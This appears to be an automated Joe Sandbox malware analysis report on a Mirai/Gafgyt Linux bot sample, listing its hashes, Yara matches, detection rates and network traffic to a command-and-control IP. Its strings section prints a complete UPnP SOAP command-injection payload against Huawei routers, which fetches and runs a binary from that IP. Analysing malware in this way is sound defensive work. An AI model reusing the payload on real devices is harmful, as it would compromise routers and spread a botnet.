Edit tour

Linux Analysis Report
resgod.x86.elf

Overview

General Information

Sample name:resgod.x86.elf
Analysis ID:1643864
MD5:f8bb50cbdd59e1d73e742e209bfe03b0
SHA1:b7ad38f69adf0870088325be578510aff1259818
SHA256:04b4b1fc7e8565c584616bba1c919f37be28c0d0a2aa6f95922c30e2a313a1b3
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1643864
Start date and time:2025-03-20 08:16:45 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:resgod.x86.elf
Detection:MAL
Classification:mal72.troj.linELF@0/0@12/0
Command:/tmp/resgod.x86.elf
PID:5419
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
resgod.x86.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    resgod.x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      resgod.x86.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0x81a0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      resgod.x86.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x8853:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      resgod.x86.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0x5ece:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xa3b8:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      5420.1.0000000000400000.000000000040e000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        5420.1.0000000000400000.000000000040e000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5420.1.0000000000400000.000000000040e000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0x81a0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          5420.1.0000000000400000.000000000040e000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x8853:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          5420.1.0000000000400000.000000000040e000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
          • 0x5ece:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          • 0xa3b8:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          Click to see the 17 entries
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: resgod.x86.elfVirustotal: Detection: 50%Perma Link
          Source: resgod.x86.elfReversingLabs: Detection: 52%
          Source: global trafficTCP traffic: 192.168.2.13:59364 -> 104.168.101.27:8944
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.101.27
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
          Source: resgod.x86.elfString found in binary or memory: http://104.168.101.27/resgod.mips;
          Source: resgod.x86.elfString found in binary or memory: http://104.168.101.27/sh
          Source: resgod.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: resgod.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
          Source: resgod.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: resgod.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//

          System Summary

          barindex
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.168.101.27 -l /tmp/.kx -r /resgod.mips; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: resgod.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: classification engineClassification label: mal72.troj.linELF@0/0@12/0

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: resgod.x86.elf, type: SAMPLE
          Source: Yara matchFile source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: resgod.x86.elf PID: 5419, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: resgod.x86.elf PID: 5420, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: resgod.x86.elf, type: SAMPLE
          Source: Yara matchFile source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: resgod.x86.elf PID: 5419, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: resgod.x86.elf PID: 5420, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Non-Standard Port
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1643864 Sample: resgod.x86.elf Startdate: 20/03/2025 Architecture: LINUX Score: 72 14 104.168.101.27, 8944 AS-COLOCROSSINGUS United States 2->14 16 daisy.ubuntu.com 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 Multi AV Scanner detection for submitted file 2->20 22 Yara detected Mirai 2->22 8 resgod.x86.elf 2->8         started        signatures3 process4 process5 10 resgod.x86.elf 8->10         started        process6 12 resgod.x86.elf 10->12         started       
          SourceDetectionScannerLabelLink
          resgod.x86.elf51%VirustotalBrowse
          resgod.x86.elf53%ReversingLabsLinux.Backdoor.Mirai
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          daisy.ubuntu.com
          162.213.35.24
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding//%22%3Eresgod.x86.elffalse
              high
              http://schemas.xmlsoap.org/soap/encoding/resgod.x86.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope//resgod.x86.elffalse
                  high
                  http://104.168.101.27/shresgod.x86.elffalse
                    high
                    http://104.168.101.27/resgod.mips;resgod.x86.elffalse
                      high
                      http://schemas.xmlsoap.org/soap/envelope/resgod.x86.elffalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        104.168.101.27
                        unknownUnited States
                        36352AS-COLOCROSSINGUSfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.168.101.27resgod.arm5.elfGet hashmaliciousMiraiBrowse
                          resgod.sh4.elfGet hashmaliciousMiraiBrowse
                            resgod.arm7.elfGet hashmaliciousMiraiBrowse
                              resgod.mpsl.elfGet hashmaliciousMiraiBrowse
                                resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                  resgod.arm5.elfGet hashmaliciousMiraiBrowse
                                    resgod.mpsl.elfGet hashmaliciousMiraiBrowse
                                      resgod.ppc.elfGet hashmaliciousMiraiBrowse
                                        resgod.arm7.elfGet hashmaliciousMiraiBrowse
                                          resgod.x86.elfGet hashmaliciousMiraiBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            daisy.ubuntu.comsshd.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            resgod.arm5.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.25
                                            resgod.arm6.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.24
                                            resgod.arc.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.25
                                            resgod.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.24
                                            resgod.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.24
                                            resgod.ppc.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.24
                                            resgod.arc.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.24
                                            resgod.arm6.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.24
                                            resgod.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 162.213.35.24
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AS-COLOCROSSINGUSInquiry 20.03.2025.xlsGet hashmaliciousUnknownBrowse
                                            • 104.168.7.32
                                            Payment_Advice.xlsGet hashmaliciousUnknownBrowse
                                            • 172.245.123.28
                                            BGL-17-2025, Packing List ... . 2073799 07 [S-29-40].xlsGet hashmaliciousUnknownBrowse
                                            • 192.3.101.146
                                            Mawaris-RFQ.xlsGet hashmaliciousUnknownBrowse
                                            • 198.12.89.24
                                            NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                            • 198.23.212.233
                                            PO 23-179, PO 23-181.xlsGet hashmaliciousUnknownBrowse
                                            • 192.3.101.146
                                            BGL-17-2025, Packing List ... . 2073799 07 [S-29-40].xlsGet hashmaliciousUnknownBrowse
                                            • 192.3.101.146
                                            Payment_Advice.xlsGet hashmaliciousUnknownBrowse
                                            • 172.245.123.28
                                            Inquiry 20.03.2025.xlsGet hashmaliciousUnknownBrowse
                                            • 104.168.7.32
                                            Mawaris-RFQ.xlsGet hashmaliciousUnknownBrowse
                                            • 198.12.89.24
                                            No context
                                            No context
                                            No created / dropped files found
                                            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                            Entropy (8bit):6.391385033751749
                                            TrID:
                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                            File name:resgod.x86.elf
                                            File size:59'184 bytes
                                            MD5:f8bb50cbdd59e1d73e742e209bfe03b0
                                            SHA1:b7ad38f69adf0870088325be578510aff1259818
                                            SHA256:04b4b1fc7e8565c584616bba1c919f37be28c0d0a2aa6f95922c30e2a313a1b3
                                            SHA512:97c009bb81adc07f2c6456317cdfc9899b32188d05a9ebffb2c16341503a8c588b6909dccd843036705be9f9e11a151e3c76c0be9b50609ed0e69e9cc319df7e
                                            SSDEEP:1536:+KdxVc90i6VSCo0yhtF37iDD7mpr/Ejo8h09:+2VK0i0o0WF3qD7mpLEjo8+9
                                            TLSH:2F434B03654140FCC5C9C6F86A8FAA26E8B7F4B81373F05963C0BD2E7E5DE142B9A645
